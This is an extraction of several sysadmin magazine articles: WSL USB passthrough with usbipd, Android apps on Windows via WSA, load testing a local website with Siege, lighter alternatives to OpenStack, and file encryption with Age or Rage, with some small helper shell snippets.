Maybe you need a smartcard reader or you develop IoT applications and want to configure a microcontroller over USB. In this case, you will unfortunately notice that WSL cannot communicate directly with USB devices connected to Windows at the present time. An indirect approach involving the USB/IP network protocol will help you. In the past, you had to make complex adjustments to the Linux kernel to do this. But on Windows 11, current instances of WSL 2 from kernel version 5.10.60.1 upward do this by default. To begin, install the latest version of usbipd-win as described on the project's GitHub page [7] with a winget command or as an MSI package. Now launch a Linux distribution and install the appropriate tools for USB/IP there, too [8]:

sudo apt install linux-tools-5.4.0-77-generic hwdata
sudo update-alternatives --install /usr/local/bin/usbip usbip /usr/lib/linux-tools/5.4.0-77-generic/usbip 20

On the Windows side, list all the available USB devices from an admin command line and connect them to the Linux environment:

usbipd wsl list
usbipd wsl attach --busid <ID>

Another list command shows that the device is connected. On the opposite side on Linux, the lsusb command should confirm this, as the smartcard reader example demonstrates (Figure 3). After completing these steps, you can detach the device again with the command:

usbipd wsl detach --busid <ID>

In this way, WSL can be useful for low-level development, as well.

Figure 3: WSL uses USB/IP to access USB devices connected to Windows.

Outlook on the Subsystem for Android

Much like the technical underpinnings for WSL, Microsoft is also looking to run mobile apps for Android on Windows with the Windows Subsystem for Android (WSA). In contrast to WSL, WSA is still in its infancy and was not offered until the recent release of the Windows 11 2022 Update, aka Sun Valley 2. Unfortunately, by the editorial deadline, only a fairly vague announcement had been released on Microsoft's blog. Now, however, the pre-release version of WSA is available in the Microsoft Store [9] [10].

Retrofitting a Graphical Package Manager

The WSA Package Manager (WSA PacMan, Figure 4) accesses the WSA developer interface and installs Android packages with a double-click. You can download the installer for WSA PacMan from the project's GitHub page [11] and install the software. It registers as the default for the APK file type if you let it. After rebooting the system, call the package manager from the Start menu, which tells you that WSA is not yet running and offers to start the subsystem.

In the next step, download Android packages on Windows from the alternative F-Droid open source repository for Android apps [12] or from Aurora OSS [13]. Now, as soon as you double-click on one of the downloads in APK format, WSA PacMan displays the permissions the respective app requests before proceeding to install the app in the subsystem. You will then find it in the Windows Start menu. Alternatively, you can call up Android's app launcher from the package manager and install additional software from the alternative app stores, such as the privacy-oriented browser by search engine coders DuckDuckGo, which is then also shown directly as a link in the Windows Start menu.

Even without the alternative app stores, various online portals offer you direct downloads of Android packages beyond the official app stores by Google and Amazon. However, be careful, because these offerings are not validated by the store providers, and you cannot rule out

WWW.ADMIN-MAGAZINE.COM    ADMIN 72    43
TOOLS    Windows Subsystems

the packages containing malware. Notes on which Android apps work with WSA are also available on GitHub [14].

Conclusions

Microsoft is continuously expanding WSL's feature set. Under Windows 11, the subsystem has already reached a practical level of maturity that makes a full-fledged virtual or even physical machine unnecessary for many Linux use cases. Graphical applications integrate seamlessly, and even the systemd init system is now available.

In contrast, WSA is still in its infancy, but this new subsystem demonstrates that Windows can be a candidate as a platform for Android apps. The practical benefits totally depend on the available apps. It remains to be seen whether Microsoft and Amazon will expand their offerings and open up to customers outside the US market. Until then, the preview lets you try out WSA.

Figure 4: WSA forms the basis for Android apps on Windows, and WSA PacMan helps with the install.

Info
[1] CBL-Mariner: [https://github.com/microsoft/CBL-Mariner]
[2] "Linux apps on Windows 10 and Chrome OS" by Christian Knermann, ADMIN, issue 66, 2021, pg. 88, [https://www.admin-magazine.com/Archive/2021/66/Linux-apps-on-Windows-10-and-Chrome-OS/]
[3] Run Linux GUI apps on WSL: [https://learn.microsoft.com/en-us/windows/wsl/tutorials/gui-apps]
[4] DirectX for WSL: [https://devblogs.microsoft.com/directx/directx-heart-linux/]
[5] WSL in the Windows Store: [https://devblogs.microsoft.com/commandline/a-preview-of-wsl-in-the-microsoft-store-is-now-available/]
[6] systemd for WSL: [https://devblogs.microsoft.com/commandline/systemd-support-is-now-available-in-wsl/]
[7] Download usbipd-win: [https://github.com/dorssel/usbipd-win]
[8] usbipd-win and WSL: [https://github.com/dorssel/usbipd-win/wiki/WSL-support]
[9] WSA with Amazon Appstore: [https://apps.microsoft.com/store/detail/windows-subsystem-for-android(tm)-with-amazon-appstore/9P3395VX91NR]
[10] Release Notes for WSA: [https://learn.microsoft.com/en-us/windows/android/wsa/release-notes]
[11] WSA PacMan: [https://github.com/alesimula/wsa_pacman/releases]
[12] F-Droid: [https://f-droid.org]
[13] AuroraOSS: [https://auroraoss.com]
[14] WSA-compatible apps: [https://github.com/riverar/wsa-app-compatibility]

Author
Christian Knermann is Head of IT-Management at Fraunhofer UMSICHT, a German research institute. He's written freelance about computing technology since 2006.
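A footnote to the USB/IP walkthrough above: once you know part of a device's name, picking the right bus ID out of the usbipd listing can be scripted. The helper below is a sketch of my own, not from the article; it assumes a listing format in which the bus ID is the first whitespace-delimited field of each device line, and the sample listing is made up for illustration.

```shell
# Hypothetical helper: return the first bus ID whose listing line contains
# the given substring. Assumes the bus ID is the first field of the line.
find_busid() {
  printf '%s\n' "$2" | awk -v pat="$1" 'index($0, pat) { print $1; exit }'
}

# A made-up captured listing (on a real system, capture the output of
# `usbipd wsl list` from an admin command line instead):
sample='BUSID  VID:PID    DEVICE                STATE
2-4    076b:3031  Smartcard Reader      Not attached
3-1    046d:c077  USB Optical Mouse     Not attached'

busid=$(find_busid "Smartcard" "$sample")
echo "$busid"    # prints: 2-4
# usbipd wsl attach --busid "$busid"   # then run the attach from Windows
```

Because the helper only does text matching, it is safe to adapt to whatever column layout your usbipd version actually prints.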

CONTAINERS AND VIRTUALIZATION Siege Benchmarking Tool

Load test your website with Siege

Stress

A stress and benchmarking tool for websites controlled from the command line. By Ali Imran Nagori

Photo by Aarón Blanco Tejedor on Unsplash

Monitoring the performance of a website and fixing performance issues is a day-to-day job for sys admins. Ignoring this part of the job could result in the loss of potential customers. Siege is an open source benchmarking tool that can greatly help you in this regard. Benchmarking tools [1] perform standardized tests for assessing the relative capabilities of hardware or software and evaluating the results.

Raison d'Stress

Siege puts your website under different stress conditions and then evaluates the following performance parameters, among others:
- Availability of the server
- Response time
- Number of successful and failed transactions
- Throughput
Siege developers define each parameter, which I talk about later in this article. Before getting your hands dirty, though, please read the "Important Note" box.

Important Note
Running Siege against third-party websites and servers without the consent of the owner is an illegal practice. Siege has a distributed denial-of-service (DDoS) effect; as such, it can bring down a running server. This article is written only for educational purposes, and you alone are responsible for any damage caused by any misuse of this software.

Although running Siege does not require much expert knowledge, interpreting its results is what you should care about, and I will try to make that part simple. Running Siege requires sudo privileges, so be sure you have administrative access to your system. In this article, I provide instructions on how to use the Siege benchmarking tool to stress test a website hosted on an Ubuntu 20.04 server.

Why Care About Siege?

Your job as a software developer doesn't end until you are confident your code will be stable in the worst conditions. Surviving traffic spikes, system crashes, memory overuse, and so on are core milestones that software needs to achieve. Siege plays a vital role in checking the stability of your code in rush hour traffic conditions.

Siege checks the strength of your code by placing it under stress, so you will know whether your site can sail smoothly under scores of transactions or whether it will crash. In this way, you can estimate how much customer volume your website can withstand before it breaks.

Installing Siege

Siege can be installed two ways: from the official distribution package or from source code.

To install from the official Ubuntu repositories, open a terminal and execute the command:

sudo apt-get install siege -y

That's it. Siege is installed.

To install from the source code, download the latest version of the file [2] and enter the following

commands to extract the file (Figure 1), change to the extracted directory, run the configure script (Figure 2), and complete the installation:

$ tar -xzf siege-latest.tar.gz
$ cd siege-<version>/
$ ./configure
$ sudo sh -c "make && make install"

Figure 1: Extracting the file.
Figure 2: Files inside the Siege directory.

That's it. Siege should now be installed on your system. To make sure everything is ready to go, enter:

$ siege -V

Next, you want to enable logging by


opening the file siegerc in Nano,

$ sudo nano /etc/siege/siegerc

and searching for the line:

#logfile = $(HOME)/var/log/siege.log

Simply remove the starting hash


symbol (#) to uncomment and save
the file.
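If you prefer to script that edit, a sed one-liner does the same job. The sketch below works on a stand-in copy of the file so it is safe to try anywhere; on a real system you would point sed at /etc/siege/siegerc with sudo instead.

```shell
# Create a stand-in siegerc containing the commented logfile line:
printf '#logfile = $(HOME)/var/log/siege.log\n' > ./siegerc

# Remove the leading hash to uncomment the line and enable logging:
sed -i 's|^#logfile|logfile|' ./siegerc

grep '^logfile' ./siegerc    # prints: logfile = $(HOME)/var/log/siege.log
```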

Siege on the Battlefield


Figure 3: Running Siege against a single target.

To understand how Siege works, you first need to deploy a simple website. In this case, I use an Apache web server that comes with a default web page. In a basic test, Siege can be run with either the IP address of the target or its fully qualified domain name (FQDN). When invoked without options, Siege uses the default configuration in the siegerc file (i.e., the siege.conf file):

$ siege 192.168.56.11

As Figure 3 shows, Siege made a total of 29,068 transactions.

Runtime can be controlled with the -t (--time) flag. The format is <NUM><unit>, where <NUM> denotes the proposed time and <unit> sets the unit of time to S, M, or H (i.e., seconds, minutes, and hours). To set the running time for each user to one minute (Figure 4), enter:

$ siege -t1M http://192.168.56.11

Figure 4: Setting the time for a Siege operation.
Figure 5: Setting the number of Siege users.


The default value of the number of users in a Siege operation is 25. However, you can override the number of simultaneous users hitting a server with the -c flag. To set this number to 30 (Figure 5), use the command:

$ siege -c 30 http://192.168.56.11

You can also use Siege to test multiple websites at once. For this, you need to create a file containing a list of the target sites. You can create such a file by going into a text editor, adding the URLs of the target sites line by line, and saving the file:

$ nano ~/target-sites.txt
www.host1.com
192.168.56.12

As you can see, you can also use the target IP addresses. Now run Siege against these sites:

siege -f ~/target-sites.txt

The results are as shown in Figure 6.

So far, the Siege command line has only comprised one or two arguments. However, you can also combine multiple operations in a single command (Figure 7),

siege -b -c 30 -t 30s 192.168.56.11

where -b specifies the benchmark mode, -c sets the concurrency of connections (in this case, 30 users), and -t sets the runtime.

Interpreting the Results

Now that you have seen Siege in action, I'll explore some of the critical metrics reported in Figures 6 and 7.

Transactions represents the number of times Siege users hit the server. As mentioned earlier, the default is 25 users. If every user hits the server 10 times, the total transactions would include 250 hits. However, this metric also includes meta redirects and responses from multiple elements of a web page, which can result in a transaction count larger than the calculated value.

Availability is the percentage of successful socket connections handled by the server. This percentage is derived from the ratio of the number of socket failures to the total connection requests.

Response time is another important parameter that shows the average time the server takes to respond to a Siege user's requests.

Transaction rate is basically the proportion of all the transactions to the total duration of the test.

Throughput is the mean traffic (in bytes per second) sent by the server to all simulated Siege users.

Conclusion

In this article, I looked at how Siege can be used to determine the potential of your website under stress. For you to fine-tune your website, you need to know how it's performing under various traffic conditions. Siege is a good choice for web developers who want to check the stability of their code.

Siege puts a lot of stress on the server, so you might experience system lag while trying to log in or while using the system. If you are new to or just learning about stress testing, Siege is a good tool to play around with; however, be cautious while running Siege in a production environment.

The Siege man page [3] contains a lot of useful information, so you should consult it to discover more about the possibilities of Siege.

Info
[1] "Benchmarking," ITC 250 W14 3210 – Web App Programming 2 (retrieved October 20, 2022), [https://canvas.seattlecentral.edu/courses/937693/pages/17-benchmarking?module_item_id=8157211]
[2] Siege FTP page: [https://download.joedog.org/siege/]
[3] Siege man page: [https://linux.die.net/man/1/siege]
[4] The author on LinkedIn: [https://www.linkedin.com/in/ali-imran-nagori/]

Author
Ali Imran Nagori is a technical writer and Linux enthusiast who loves to write about Linux systems administration and related technologies. He blogs at [tecofers.com]. Connect with him on LinkedIn [4].

Figure 6: Targeting multiple sites.
Figure 7: Combining multiple Siege operations.
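To make the arithmetic behind two of these metrics concrete, here is a quick calculation with made-up numbers (not output from a real Siege run): the transaction rate is the transaction count divided by the elapsed time, and throughput is the data transferred divided by the elapsed time.

```shell
# Hypothetical figures for a roughly one-minute run (not from a real test):
transactions=29068   # total hits recorded by Siege
elapsed=59.52        # elapsed time in seconds
data_mb=264.47       # data transferred in MB

# Transaction rate = transactions / elapsed time
awk -v t="$transactions" -v e="$elapsed" \
    'BEGIN { printf "%.2f trans/sec\n", t / e }'   # prints: 488.37 trans/sec

# Throughput = data transferred / elapsed time
awk -v d="$data_mb" -v e="$elapsed" \
    'BEGIN { printf "%.2f MB/sec\n", d / e }'      # prints: 4.44 MB/sec
```

Running the same arithmetic against the numbers in your own Siege report is a quick sanity check that you are reading the output correctly.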

48 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
CONTAINERS AND VIRTUALIZATION    OpenStack Alternatives

Alternative virtualization solutions


when OpenStack is too much

Plan B
OpenStack is considered the industry standard for building private clouds, but the solution is still far too
complex and too difficult to maintain and operate for many applications. What causes OpenStack projects
to fail, and what alternatives do administrators have? By Martin Loschwitz

Ten years ago, reports of the decline of OpenStack would have been completely unthinkable. For a while at least, many people thought that OpenStack was a miraculous solution for most of their IT problems. From the perspective of 2022, many, if not most, of the hopes once associated with OpenStack (Figure 1) have not been met for the majority of users.

In the Kubernetes era, OpenStack has shrunk massively as a project, with nothing like the number of developers actively involved as there were in the past. Similarly, many

Lead Image © elnur, 123RF.com

Figure 1: OpenStack is considered the ultimate in private cloud software, but the complexity of the environment often exceeds what
enterprises can realistically achieve. © OpenStack Foundation


formerly prominent and almost militant OpenStack proponents have scaled back or ended their OpenStack involvement.

This development also has its good side. In the course of the past decade, several large-scale OpenStack projects failed because expectations and requirements were more or less undefined up front. Additionally, it was not clear in some cases what OpenStack is, what it can do, and what it cannot do. Often enough, OpenStack was chosen for projects that could not be implemented at all with this tool, or only with massive restrictions.

That many manufacturers have dropped out is not automatically considered a great misfortune. For example, participation of all storage vendors (e.g., HP, Dell EMC, SanDisk) meant great hardware support for numerous devices, but it also meant all the major vendors dispatched as many employees as possible into the fray to determine the fate of the project. OpenStack has now largely freed itself from this stranglehold.

Where OpenStack Fails

Administrators are still skeptical when it comes to storing their data with AWS and the like and face a dilemma: A public cloud doesn't work because people are worried about their data, but when it comes to a private cloud, many administrators automatically think of OpenStack and get cold feet. It makes sense to address the reasons that cause OpenStack projects to fail, because this is the only way to empower admins to evaluate realistically whether OpenStack is suitable for their intended use case. Where the answer to the suitability question is "no," I look at potential alternatives.

The saying "the cloud is just somebody else's computer" stopped being true a long time ago. Today, "cloud" also means infrastructure automation, Infrastructure as Code (IaC), immutable underlay, microarchitecture, and so on. Although OpenStack development has slowed, it still remains a complex construct and today comprises more than 30 individual components; admittedly, not every admin really needs every one of them. If you reduce the number of tools to the absolute minimum, however, you are still left with at least six components. You need to know what they are and clearly understand the basic functionality of tools such as Nova, Cinder, or Glance.

Many large OpenStack projects have failed to clear this simple hurdle. In many cases, problems of understanding have led to companies seeing OpenStack as a continuation of VMware by other means. In terms of comfort and ease of administration, however, OpenStack cannot and never wanted to compete with VMware. Moreover, classic VMware setups are often based on completely different premises; for example, software-defined networking (SDN) is missing as a core component. Many companies that adopted OpenStack in the hope of cost savings suddenly found themselves faced with uncontrollable complexity and eventually gave up in total frustration. Often the reason was that the goal of operating some virtual machines (VMs) was out of proportion to the overhead.

OpenStack Is Complex

To this day, OpenStack Summits regularly feature presentations of companies proudly talking about their automated OpenStack, putting the number of servers per admin at 2,000 units and more. In fact, OpenStack can be operated in this way, but before automation and orchestration are set up, adapted, and in operation, a great deal of work must be done – and by personnel who know their stuff.

It is virtually impossible for a company with no OpenStack experience to turn to a boxed solution like Red Hat OpenStack Platform (RHOP) and build a giant cloud with full automation in just a few weeks. After too long a development period without concrete results, quite a few companies are either running out of patience, money, or both to continue working on OpenStack. It is precisely these OpenStack behemoth projects that have done massive damage to the software's reputation over the past decade.

In summary, the reasons for the failure of OpenStack in many organizations are: too little research in advance, unrealistic assessment of OpenStack's complexity, the wrong choice of OpenStack on the assumption that all of its features are needed, and excessive overhead for operating the product itself in an automated and therefore efficient way.

Possible Alternatives

The beauty of analysis is that it also shows a way out of the predicament by setting out the parameters that ought to play a role when choosing an alternative to OpenStack.

Many companies, for example, need virtualization with a feature such as high availability, but often multitenancy is not a factor. However, this already accounts for a considerable part of OpenStack's complexity, because it often drags in other features, such as SDN. Still other companies might need a sophisticated virtual network, but not OpenStack's self-service capabilities. These capabilities frequently play a significant role in the project, because on-demand use is a central characteristic of clouds.

Classical virtualization with minor VM fluctuation, on the other hand, can often do without colorful web interfaces, which in turn contributes significantly to reducing complexity. This pruning to essentials leaves a small but select group of less complex OpenStack alternatives, which I discuss in detail.

oVirt

Some administrators might be more familiar with oVirt (Figure 2) under the name of its commercial variant, because oVirt is the open source


Figure 2: oVirt is Red Hat’s virtualization manager, offering many features that can also be found in OpenStack. © Red Hat

foundation of Red Hat Enterprise Virtualization (RHEV; Figure 3). Red Hat continues to be one of the most active OpenStack developers and thus one of the few companies that still have a commercial OpenStack distribution in its portfolio – Red Hat OpenStack Platform. However, RHOP is hardly likely to compete with its sibling RHEV internally, which means that oVirt is a plain vanilla virtualization solution for small environments, although the feature set is quite impressive.

The linchpin of the product is a controller node that runs all oVirt basic services. Red Hat fans have a clear advantage because oVirt is only available in packages for RHEL 8 and CentOS Stream 8. However, it will run on AlmaLinux 8 and Rocky Linux 8. After installing the basic components, you first need to assign disk space to the new oVirt instance – with a cornucopia of options from which to choose, including NFS,

Figure 3: Those who need an option with support rely on oVirt’s commercial distribution RHEV. © Red Hat


GlusterFS, Fibre Channel, and other POSIX-compatible filesystems.

Ceph is interestingly missing from the list of storage drivers for oVirt, which is surprising because Ceph has long established itself as a rock-solid solution for scalable storage, even outside of OpenStack. Unlike OpenStack, Ceph can be set up and ready for operation in a fully automated manner in a fairly short time. Unlike OpenStack, Ceph causes very little overhead in everyday administration and takes care of most of its problems itself to boot.

If you dig deeper into the documentation, you will find out how Red Hat imagines the Ceph connection in oVirt, and you will end up with – surprise – an OpenStack component. As you know, the service responsible for storage in OpenStack is named Cinder. It can run quite well without the rest of the OpenStack components, essentially communicating with the storage back ends in the background to create volumes. Cinder then outputs their paths to requesting instances such as oVirt.

If you combine oVirt and Ceph, you also get a little piece of OpenStack, but the overhead involved in using the cinderlib driver in oVirt doesn't even begin to compare with the complexity of the connection in OpenStack itself.

Many Features

In addition to the controller, the administrator of an oVirt installation also provisions any number of virtualization hosts (i.e., the actual compute nodes). The nodes communicate with their controller through a controller agent process and thus know what they have to do. The reward for this effort is a small but fine virtualization solution that can even be extended to include a rudimentary kind of self-service over a Lightweight Directory Access Protocol (LDAP) connection. However, oVirt does not envisage complex virtual network setups. On the one hand, this facilitates troubleshooting; on the other hand, it drastically reduces the number of possible sources of error.

oVirt also integrates a feature that many admins miss in OpenStack right out of the box. The data warehouse writes metrics data with thousands of values in the background and makes them directly available in oVirt through interfaces, which makes it far easier to connect to monitoring or trending systems. An oVirt exporter can even export data from oVirt's data warehouse in a format suitable for Prometheus [1].

In terms of everyday functionality, oVirt leaves little to be desired. Ready-made operating system images can be defined in this way, and it is possible to create snapshots of existing VMs, making backup and restore operations far easier. All told, oVirt is a very powerful OpenStack alternative, especially for small setups. Admins who just need virtualization should keep that in mind.

DIY Cluster: Linux-HA

It may be down to my nostalgic feelings that I've even mentioned the virtualization cluster archetype; however, it could also be because a setup of this type is the easiest and fastest way to set up a few highly available VMs as quickly as possible.

Considering the complexity of solutions like OpenStack and even oVirt, the Linux-HA (high availability) stack is definitely not the most complex product under the sun. Additionally, Red Hat has put a great deal of work into getting the former horrors of Heartbeat 2 and its successor Pacemaker under control in recent years. Today, hacking XML files is just as superfluous as memorizing cryptic shell commands to feed the cluster with the resources you want it to manage.

At the same time, the Linux-HA stack and all its components are more or less available wherever you look. Red Hat (RHEL) and SUSE Linux Enterprise (SLES) distribute it in the form of an add-on, and matching packages are also included with Ubuntu and Debian. In other words: If you have three systems running a popular Linux distribution, you can quickly get a Pacemaker cluster up and running. Countless how-tos online now explain how this works in great detail.

Pacemaker has probably not been used for any task as regularly over the past 15 years as it has been for running virtual instances. The VirtualDomain resource agent has long since proved its value and is now generally thought of as being reliable and stable. Connecting external storage services such as Ceph is almost easier in a setup of this type than with oVirt. You just need to enter the path to your RADOS block device (RBD) in the libvirt definition of the respective instance, and you are ready to go.

On top of that, Pacemaker handles at least basic balancing of resources easily. For example, a three-node cluster can be made to distribute three VMs evenly across the three servers. You can even have a Pacemaker instance shut down should a server fail. Although this method is not a comprehensive placement strategy, like those that exist in OpenStack or oVirt, it is often good enough for small environments.

In this scenario, however, administrators do have to do without many goodies, such as self-service over a web user interface (UI) or virtual networking by SDN. Colorful wizards for setting up new instances are also missing; in fact, the package does not even include image management. If you need any of these features, you are undoubtedly better off with oVirt or Proxmox, but if you really only want to virtualize a few VMs, Pacemaker will get you there quickly. Today, Pacemaker even has automation modules (e.g., Ansible) that let you handle tasks completely automatically.

The Veteran: Proxmox

If you think Pacemaker is too much of a hassle, you'll probably be happier with Proxmox. From today's perspective, Proxmox can almost be considered a kind of veteran in the virtualization business, and what


the project has achieved over the past few years certainly speaks for itself. In many respects, Proxmox is even on a par with its competitor VMware – but let's take things one step at a time.

At the heart of Proxmox was the desire to create a simple way to manage virtual instances and their storage needs. When the first versions of Proxmox saw the light of day, neither oVirt nor OpenStack were as advanced as they are today, and a kind of race for users' favor emerged between Proxmox and oVirt in particular. As things stand, Proxmox might even have won the honors because the product is now seen as the logical VMware replacement and successor to oVirt in many places.

In terms of functionality, Proxmox (Figure 4) really doesn't need to hide its light under a bushel. The key to the solution is a dedicated management plane that can be rolled out to one or dozens of systems, with the systems handling the coordination tasks themselves. One major strength of the solution is its web interface, which gives even less experienced users access to quite a few functions in the background. Thanks to appropriate rights management and role-based access control (RBAC), the Proxmox UI can also be used for basic self-servicing.

Users who found tinkering with Pacemaker too much can enjoy complete Pacemaker handling as part of the Proxmox package. Compute nodes can be defined as HA nodes, and Proxmox takes care of rolling out and configuring the required HA services on the affected systems in the background.

Moreover, the integration of various storage back ends is legendary. For HA, for example, support for the distributed replicated block device (DRBD) replication solution was offered as early as a decade ago. Today, people tend to rely on Ceph, which Proxmox can even automate when called on to do so. Of course, this only works if you have the right hardware in place. The same applies to your own storage replication stack based on ZFS if no hardware is available for Ceph or you do not want to use the product.

Beyond that, Proxmox leaves little to be desired in terms of functionality. For storing templates for virtual instances, Proxmox supports KVM virtualization, as well as container virtualization based on Linux containers (LXC). Proxmox handles containers and VMs as equivalent virtual instances. Its own setup is also manageable. The solution is up and running quickly, not least thanks to a comprehensive installation guide on the project page.

The provider's distribution policy causes many an administrator to frown – although this attitude is not totally fair. Proxmox Virtual Environment (Proxmox VE) is available under a free license and can be obtained as open source software from the provider's GitHub directories completely free of charge. However, building packages is then up to the user, and it is this step that many companies want to avoid. Those who are only keen on the packages and do not want any support from the manufacturer are asked to pay a EUR95 (~$93) subscription fee per year and CPU

Figure 4: Proxmox is a genuine veteran when it comes to virtualization, but today it coexists well with other solutions (e.g., Ceph) and even
rolls them out on its own in some cases. © Proxmox


socket, so a setup with four sockets would cost EUR380 (~$372). Given Proxmox's impressive feature set and ease of installation, this does not seem excessive.

OpenNebula

OpenNebula belongs on any list of OpenStack alternatives. The product has basically acted as a kind of anti-OpenStack from the very beginning. Far less complexity, simpler UIs, easier operation, and more automation out of the box are just some of the promises vendor OpenNebula uses to attract customers – and OpenNebula actually delivers on most of its promises.

Automated installation of OpenNebula (Figure 5) with all the required components is an easy and quick process – at least if you get your planning right up front, including the web interface, which is so important for genuine cloud computing, as well as any software that might be required in the background, such as Ceph. Basic SDN functionality with OpenDaylight or Open Virtual Network (OVN) is now available, as is comprehensive handling of storage volumes. The provider garnishes the whole thing with neat administration of VM templates and an intuitive web interface, including multitenant capability. All told, OpenNebula is a genuine alternative, especially for smaller cloud setups.

Some people might wonder why OpenNebula shouldn't replace OpenStack completely. As usual, the devil is in the details. In some ways, OpenNebula is what many enterprises once hoped OpenStack would be – a virtualization solution that is not overly complicated and offers basic cloud functionality, automation, and self-service. OpenStack has never been able to live up to this claim, if only because many large telcos and other companies had a say in the fate of the project and sometimes unrestrainedly asserted their own interests. The result was the kind of complexity that exceeds the capabilities and possibilities of smaller setups a priori. For most small environments, OpenStack can simply do too much. OpenNebula offers an attractive alternative, with sufficient numbers of useful features for small environments without being overly complex.

Conclusions

As this article shows, you rarely will have to resort to OpenStack. OpenStack has its sweet spot in large corporations that are becoming platform providers and need to offer huge virtualization environments in the process. However, this is not the case for most smaller companies, so check before you commit. The first step in introducing a new virtualization environment should always be to document your needs accurately.

If you don't need most classic cloud functionality, a DIY solution with Pacemaker, Libvirt, and Qemu is a valid option, because it is easily manageable. If you are looking for a successor to VMware, Proxmox and oVirt are logical first choices. If you really need to create a kind of cloud, but without the overburdening complexity of OpenStack, OpenNebula is likely to be the environment of choice. This example once again demonstrates the strength of the F/LOSS community, which has a ready-made solution for problems of any size.

Info
[1] oVirt exporter for Prometheus: [https://github.com/czerwonk/ovirt_exporter]

The Author
Freelance journalist Martin Gerhard Loschwitz focuses primarily on topics such as OpenStack, Kubernetes, and Chef.

Figure 5: OpenNebula has been successfully marketing itself as a sort of anti-OpenStack for years. If you are fed up with the excessive
OpenStack complexity, you will most likely find what you are looking for here. © OpenNebula
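The DIY option mentioned in the conclusions – Pacemaker, Libvirt, and Qemu – starts with a libvirt domain definition. The sketch below generates a minimal one from the shell; the VM name, memory size, and disk path are illustrative placeholders, not values from the article, and the virsh commands are left as comments because they require a running libvirtd:

```shell
# Sketch: generate a minimal libvirt/QEMU domain definition.
# "testvm" and the disk path are hypothetical placeholders.
cat > testvm.xml <<'EOF'
<domain type='qemu'>
  <name>testvm</name>
  <memory unit='MiB'>1024</memory>
  <vcpu>1</vcpu>
  <os>
    <type arch='x86_64'>hvm</type>
  </os>
  <devices>
    <disk type='file' device='disk'>
      <source file='/var/lib/libvirt/images/testvm.qcow2'/>
      <target dev='vda' bus='virtio'/>
    </disk>
  </devices>
</domain>
EOF
# With libvirt installed, the domain would then be registered and started:
#   virsh define testvm.xml && virsh start testvm
grep -c '<name>testvm</name>' testvm.xml   # -> 1
```

In a Pacemaker cluster, the same domain XML would typically be handed to the ocf:heartbeat:VirtualDomain resource agent so the cluster, not you, decides where the VM runs.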

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 55
SECURITY: Age/Rage File Encryption

Encrypt and decrypt files with Age or Rage

Keep It Simple

Age and Rage are the Go and Rust implementations of a simple, modern, and secure file encryption tool. By Matthias Wübbeling

Photo by Pierre Châtel-Innocenti on Unsplash

Encrypting files ensures the IT security protection goal of confidentiality. Depending on which method you use, integrity and accountability can be ensured, as well. Asymmetric encryption is easier with Age than with GnuPG. In this article, I look at how to use Age and how you can use it in practice.

The Role of Encryption

IT security protection goals define requirements for data or the contents of files during storage or transmission. File encryption is useful and important in many enterprise scenarios. Encryption makes sense, and not just when you need to send data over insecure channels such as the Internet, but also for data that is no longer needed in everyday life or that is already backed up and no longer needs to be kept available in the clear. Cryptographic techniques can be used to store such data confidentially and verify its integrity on recovery.

Encrypted backups or routinely encrypted older files in an archive primarily provide protection against a potential attacker copying large volumes of information and subsequently publishing or selling this information to other market players. Of course, this does not protect you against ransomware infestation. Also, the assigned private key or password used for decryption should not simply be stored on the hard drive of your computer or server.

Not Always GnuPG

Many distributors use GnuPG to sign their packages and distribute the public key accordingly. Therefore, most distributions are capable of encrypting or signing files out of the box. At the command line, you can easily sign a file with a private key stored in the keychain:

gpg --detach-sign -o sig.gpg secret.txt

After doing so, the file sig.gpg with the signature can be forwarded to the recipient. With your public key, it is easy to check whether the file has been modified since it was signed. This process ensures integrity. Encrypting a file with GnuPG works in the same way, but now you need the recipient's public key or, in the case of multiple recipients, all of the corresponding public keys. You would need to run the following command to encrypt a file named secret.txt:

gpg --encrypt --armor -r recipient@admin-magazine.com secret.txt

Because GnuPG offers many other possibilities besides plain vanilla


encryption, it is not always the best choice for straightforward use. Although the software has sensibly chosen default values, they are not always transparent, and the many options certainly give users scope for errors. If you want to exchange files easily and securely on the basis of asymmetric keys, nobody is forcing you to use GnuPG.

Easy and Quick with Age

Age is the acronym for "Actually good encryption," and that is what the developer promises. Age is a small tool implemented in Go [1] that supports all the classic operating systems. The first stable version 1.0 was released just over a year ago. Alternatively, you can use the implementation in Rust, named Rage [2]. The Go version is well ahead in terms of performance, though, especially with large volumes of data.

Age has a clearly defined feature set with only a few configuration options, which makes both the program and the API very easy to use, virtually eliminating configuration errors by the user. In the remainder of this article, I look exclusively at how to use the program on Linux.

Age supports different file recipients, who are selected by their public keys, which you specify in each case with the -R argument during encryption. After the install, which is very easy because the packages exist for popular Linux distributions, you need to create a new private key with the command:

age-keygen > private.key

You can copy the public key from the output or take it from the commented lines in the private.key file; just ignore the hint about the potential risk posed by the file's insecure access rights in this example. In production, you would use umask up front to adjust the permissions of the new file. If you only want to output the public key at the command line for the private key in the file, use the command:

age-keygen -y private.key

The keys generated are in the form of Base32-formatted X25519 identities (i.e., they are based on elliptic curves). In addition to Age's own format keys in version 1, Age also accepts SSH keys for encryption, which can be for the same 25519 elliptic curve (ssh-ed25519) or RSA keys (ssh-rsa).

The use of SSH keys may seem unusual at first glance, but it is perfectly suitable and very practical because these keys are already distributed in many places. Especially in the developer environment, you will find many public SSH keys in profiles on GitHub or GitLab. Unlike GnuPG, however, when using Age, you do not have a web of trust to verify the keys or to establish trust in the keys.

If you want to make your data available to several recipients on a regular basis, you can store the recipients in a recipient file. The different key types of the recipients can be combined in a single file. After adding the public keys of the recipients to the recipient.txt file – one key per line in the normal way – encrypt your data:

echo Admin Magazine | age -R recipient.txt -a

The -a sends the output to an ASCII wrapper, with which you are probably already familiar from GnuPG. With the command

echo Admin Magazine | age -R recipient.txt -a | age -d -i private.key

you can test decryption directly.

Authenticated Data

Even though Age can be used for file encryption in a very simple way, it is particularly useful in scenarios where information is encrypted or decrypted as a data stream. By default, Age processes data from standard input and returns the results on standard output. Age's natural habitat is therefore the command line, scripts, or cronjobs.

Age not only ensures the confidentiality of the data, but also its authenticity and integrity. During decryption, the tool immediately checks the integrated Message Authentication Code (MAC). The principle known as "authenticated encryption with associated data" (AEAD) checks for possible changes to the ciphertext for each block, preventing various attacks on the encryption or the integrity of the data in the process. Unlike GnuPG, however, the files cannot be cryptographically signed, and Age does not support attribution to an author through a signature.

Conclusions

